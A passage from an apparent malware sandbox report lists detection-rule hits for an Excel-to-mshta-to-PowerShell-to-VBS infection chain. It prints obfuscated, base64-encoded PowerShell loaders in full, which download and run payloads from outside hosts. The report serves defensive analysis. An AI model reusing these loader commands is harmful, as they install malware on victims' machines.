'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAn
        Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3588, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood[1].hta
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4004, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" , ProcessId: 3380, ProcessName: wscript.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAn
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgI
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3588, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3880, ProcessName: mshta.exe
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4004, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" , ProcessId: 3380, ProcessName: wscript.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4004, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.cmdline", ProcessId: 3144, ProcessName: csc.exe
        Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 104.21.34.183, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3588, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4004, TargetFilename: C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS
        Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3588, Protocol: tcp, SourceIp: 104.21.34.183, SourceIsIpv6: false, SourcePort: 443
        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4004, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" , ProcessId: 3380, ProcessName: wscript.exe
